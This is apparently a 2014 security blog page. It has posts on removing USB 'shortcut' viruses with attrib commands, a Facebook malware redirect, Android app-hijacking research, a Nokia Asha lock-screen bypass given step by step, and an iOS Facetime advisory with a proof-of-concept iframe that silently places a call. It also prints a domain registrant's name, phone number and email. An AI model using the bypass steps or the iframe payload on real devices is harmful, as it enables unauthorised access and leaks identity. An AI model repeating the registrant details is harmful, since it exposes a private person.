Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label Bugs. Show all posts
Showing posts with label Bugs. Show all posts

Sunday, December 7, 2014

How to remove virus from your Computer using cmd (autorun, emptyfolder virus)

Hi guys! Are virus creating problems foe you ? Though your antivirus software removes virus and problem persists, searching google for the removal and you are into a perfect site for a solution. Here’s a trick to remove all your viruses. Follow the steps given below to remove viruses using cmd ( command prompt ) .

How to remove autorun virus using cmd  ?Steps : 
  • Press ( Start or winkey ) -> Run -> cmd.
  • If you are at the root directory ( C drive ) then do the following, else give cd.. and come to the root C:> and do the following. 
  • Type in ( attrib -h -r -s autorun.inf ), without brackets and press Enter.
  • Type ( del autorun.inf ), without brackets and press Enter.
  • Follow this for all other drives. 



How to remove empty Folder virus using cmd  ?
 
  Got some Files in your pen drive but they are empty! Because of the virus in your pendrive malfunctions your drive. How to remove this empty folder virus and recover files? Follow the steps given below.

  • Start -> Run -> cmd.
  • Type this command: attrib -h -r -s /s /d x:*.
  • Here the letter “x” should be replaced with the drive alphabet of your pendrive that you have inserted into the computer.
  • If your pendrive shows the drive alphabet as “J“, then type  this command: attrib -h -r -s /s /d j:*.
  • And then press a gentle Enter.

How to remove Shortcut virus using cmd  ?
Click here for it 

Recover your files :

     You can recover your files through Winrar.



  •  Open WINRAR Application.
  •  Navigate to your Pendrive location or PC Folder location.
  •  Copy Files and Paste where you want.
  •  Format your Pendrive.
 I hope it works.If still you have problems then comment below I'll try to help you

Thursday, December 4, 2014

How to Remove shortcut virus from Pendrive, PC, windows7,8 or memorycard

If all your folders in pen-drive/flash drives or memory cards are converted into shortcut icons then it is a good news for you.   shortcut virus remove
Now I’m going to tell you how to remove this virus without using any antivirus software. If you have not formatted your flash drive then you can solve this problem.

How to remove Shortcut virus?

     Follow the below Steps to remove Shortcut Virus:
  • Go to Start -> Run -> cmd.
  • Go to your pen drive, memory cards or mobile phone directory.
  • Type del *.lnk (to delete all link files in the directory)
  • Type attrib -h -r -s /s /d e:*.*
  • Replace e with your drive letter.
  • And then press a gentle Enter.
Just follow the below given steps to remove, delete, wipe out or whatever the shortcut virus from your pen drive, memory cards or even mobile phone and recover back your files.

Note : After when you got your files, just copy your files somewhere in your PC and format your drive and then copy again your files to the drive. Only then your shortcut virus will get off from your PC…!

     Still having problems then try following steps
  • If you are getting attrib not recognized error then follow these steps-

attrib command troubleshooting:

 shortcut virus remove
  When you try to use some attrib commands in command prompt like ” attrib -h -r -s /s /d e:*.* ” There may be any one of the following reasons:


  • Check with your command given, Check for spell mistakes and spaces.
  • You have given the command correctly, but it’s not found in the directory. You may fail to give the class path, where the Command prompt variables are defined. 
set path
  •  My Computer – > Properties -> Advanced -> Environment variables
  • In system Variables, double click on the path to edit.
  • Give these two paths there, If not Present. 
                        1. C:\WINDOWS\system32;   
                        2. C:\WINDOWS
 
  • If you are getting access denied error

Fix – access denied for attrib command in Windows

                  When you are using your attrib commands for the purposes like ” Virus Removal “, there are some chances of getting access denied,

Follow these steps to recover:

               When you get access denied when trying to use an attrib command in command prompt window, Just follow the following steps to fix it.

 1. Restart your PC in Safe mode
 2. Do a Check Disk (CHKDSK)
 3. Try your attrib command now.
 
Note: If the Drive gets infected again and again ” Make a Boot Time Scan Using Avast Antivirus”

               This will really work. 
 If still you are facing problems then comment below I'll try to help you....
  

Sunday, August 24, 2014

Technical Description of Latest Facebook Virus- Sorpampa

Beware of a new Facebook virus called 'Sorpampa', spreading through Facebook Messages."This video is yours?", tries to disable/bypass the anti-virus software, then spreads itself by different chat sessions of the infected user/system.

How to remove it? Read a clear description at http://cyb3rgeeks.blogspot.com/2014/08/facebook-malware-this-video-belong-to-you-thatis-funny.html
 

What the virus does, well it redirects you to a*m*k-m*t*2[dot]com , example:-
<script> location.href="http://www.a*m*k-m*t*2[dot]com/?bencegomik"; </script> (without *'s)

Then when reading the source code on that page, it's clear enough to me they try to infect you.

After checking the domain info of http://www.a*m*k-m*t*2[dot]com, it seems this is the owner:-
(note: i do not say/blame this is the person that spreads the virus, but this is the person that hosts the virus/script)(Regards Ray bro)

Registrant Name: BAYRAM ACAN
Registrant Organization: BAYRAM ACAN
Registrant Street: bbbbbbbbbb
Registrant City: ISTANBUL
Registrant State/Province:
Registrant Postal Code: 34100
Registrant Country: TR
Registrant Phone: +90.5442396707

Registrant Email: saner.3@hotmail.com

Saturday, August 23, 2014

Gmail Android app hacked by researchers

US Researchers have found a weakness in Google’s popular Android operating system.Your most trustworthy apps may be at risk. Researchers say they have found a way to hack Gmail apps with a 92 percent success rate.

The vulnerability extends to a number of other apps including H&R Block, Newegg, WebMD, Chase Bank, Hotels.com and Amazon, according to their study. In most cases, their technique succeeded 80-90% of the time. Amazon’s app was the most difficult to crack at 48%.

gmail hack

Although the paper only covers these seven Android apps, the researchers said their hacks exploit a vulnerability that apps on other operating systems likely share.
"I certainly think the report is credible," cyber-security analyst Michela Menting said in an email. "If a researcher or a hacker looks hard enough, there will be ways to exploit any number of vectors within an application."

Technical Section(How did they do it?)

The hack begins when a user downloads malicious software disguised as a seemingly harmless app like background wallpaper app. Next, the masquerading app exploits a common feature of operating systems—shared memory —to figure out what users are doing on their smartphones.

When timed properly—say, just as a user is entering a username and password, or snapping a picture of a personal check—a hacker can launch a phishing attack. Users think they’re punching their passwords into an app like Gmail, Amazon or Chase, but they’re actually typing it into a sham-screen generated by the malicious app.“At this point, the information is stolen and the attack succeeds,” the authors said in the study. Two of the researchers hail from University of Michigan and another from University of California at Riverside.

Demo videos show how a hacker could use another phone to monitor the activity on the sensitive apps and grab personal information when entered by the victim.





The hack exploits the same design principle that allows alarm and apps that serve as reminder to pop up on a smartphone. Zhiyun Qian, assistant professor at UC Riverside and one of the study’s authors, said in a statement that “by design, Android allows apps to be preempted or hijacked.” 

The hacker would gain access by causing a user to install a seemingly harmless app such as phone wallpaper and expose a newly discovered public side channel that doesn't require privileges. This feature allows processes to share data efficiently and is quite common, since all a phone's downloaded apps interact with one operating system.

"The assumption has always been that these apps can't interfere with each other easily," researcher Zhiyun Qian said in a statement. "We show that assumption is not correct and one app can in fact significantly impact another and result in harmful consequences for the user."

Why Amazon is less vulnerable?

The researchers said they had only a 48 percent success with the Amazon app because it allows transition from one activity to almost any other, increasing the difficulty of guessing what the user is doing and finding the exact moment to steal data.


How to secure your smartphone from it?
  • Users should be cautious and only download apps from trusted sources—big, popular apps are hacker magnets.
  • Do a routine check of your smartphone and tablet, especially if you have little ones using the device, to ensure only apps that can be trusted are the only ones installed. Immediately uninstall apps that appear to be from unknown sources or are not necessary.

 The researchers suspect their method will work just as well on other mobile OS, such as Apple iOS and Microsoft Windows, although they have yet to attempt the hack on those systems. They were scheduled to present their findings today at the USENIX Security Symposium in San Diego.
Google did not immediately respond to a request for comment.
I hope you enjoyed it.... Give us feedback that next we can serve more better.....

Monday, July 14, 2014

Nokia Asha Series Lock Screen Cracked

There have been a lot of lock screen bypasses lately in almost every mobile deice such as iPhone, Samsung galaxy, HTC etc and if you observe carefully most of them rely upon abusing the "Emergency Calling" option some how. Hammad Shamsi a Security researcher from RHAinfoSec has found a lockscreen bypass which resides in all the latest versions of Nokia Asha series. The bypass occurred due to mishandling of SOS button (Emergency Panic Button) which is present in all Nokia Asha Series and is used to perform the emergency calls.

                                

How to Reproduce? Here are the steps to reproduce, in case you are curious:
 i) First, set up the lock code to lock the screen.

 ii) Next, type any number on the unlock screen. 

iii) Next, press the SOS button followed the green button and you are sent to recent call lists. This could be furthur abused into gaining complete phonebook access, add/delete a number, turning bluetooth on/off etc. Hammad, has created a series of three video which demonstrates how you could go about accomplishing it.

Nokia Asha Lock Screen Bypass - Video #1



Nokia Asha Lock Screen Bypass - Video #2



Nokia Asha Lock Screen Bypass - Video #3




 

Thursday, March 13, 2014

Apple Facetime Information Disclosure

-Affected Vendor: https://www.apple.com/
- Affected Software: Safari/Facetime on iOS
- Affected Version: iOS 7 prior to 7.1

Facetime allows video calls for iOS. Facetime-Audio, added in iOS 7, allows audio only calls. The audio version uses a
vulnerable URL scheme which is not used by Facetime Video.
The URL Scheme used for Facetime-Audio allows a website to establish a Facetime-audio call to the attacker's account,
revealing the phone number or email address of the user browsing the site.

By entering the URL in an inline frame, the attack is automated, and similar to a CSRF attack across apps. Safari does
not prompt the user before establishing the call.

**Impact**

A user browsing the web could click a malicious link or load a page containing a malicious link within an inline frame.
The user would then automatically contact the phone number or email address specified in the URL, revealing his identity
to the attacker.

**Proof of Concept**

Entering the following URL in iOS would trigger the call to the email address specified: facetime-audio://user@host.com

This inline frame would have the user call the specified email address as soon as the HTML page is loaded, without
prompting the user:

<iframe src="facetime-audio://user@host.com"></iframe>

Security Content of iOS 7.1: http://support.apple.com/kb/HT6162